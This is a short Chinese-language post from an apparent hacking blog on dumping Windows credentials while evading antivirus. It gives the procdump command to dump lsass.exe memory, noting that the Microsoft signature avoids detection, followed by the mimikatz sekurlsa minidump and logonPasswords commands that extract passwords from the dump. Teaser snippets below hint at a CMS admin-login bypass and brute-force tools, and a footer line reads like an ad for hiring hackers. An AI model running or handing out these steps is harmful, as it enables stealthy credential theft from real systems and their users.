绕过杀毒软件抓取windows密码

hacker5年前 (2020-05-31)黑客文章853

使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。

			mimikatz # sekurlsa::minidump lsass.dmp
		
			Switch to MINIDUMP
		
			mimikatz # sekurlsa::logonPasswords

具体可以参考原文：

http://blog.gentilkiwi.com/securite/mimikatz/minidump

标签: 黑客技术

返回列表

immunity debugger 翻译中文也可了解为“免疫力程序调试”；什么是免疫程序调试？免疫系统疾病CANVAS pentesting专用工具能够用于检测你的系统软件真的是多...

什么叫Honeyd？ Honeyd由Niels Provos建立，是一个开源代码，使客户可以在各种各样计算机网上建立和运作云虚拟主机。客户能够配备这种云虚拟主机来仿真模拟不一样种类的网络服务器，使...

把以下代码中的：validate=dcug 改为当前的验证码，即可直接进入网站后台，此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login....

什么叫Helix3 Pro？如同之前的专用工具一样，Helix3 Pro是为计算机取证订制的与众不同专用工具。它早已十分细心地建立，以防止以一切方法触碰服务器，而且它是法医鉴定的。好的是Helix...

这是3389远程桌面的连接界面，当我们连接到服务器准备数据密码登录的时候，提示：你已经被拒绝登录到终端服务器。【解决方案】：本地登录服务器，进入...

什么叫Medusa？ Medusa为一个规模性平行面，模块化设计，迅速和登陆的野蛮人。目地是适用很多容许远程控制认证的服务项目。该专用工具的关键作用包含根据进程的并行处理检测 - 能够对好几个服务...

找黑客平台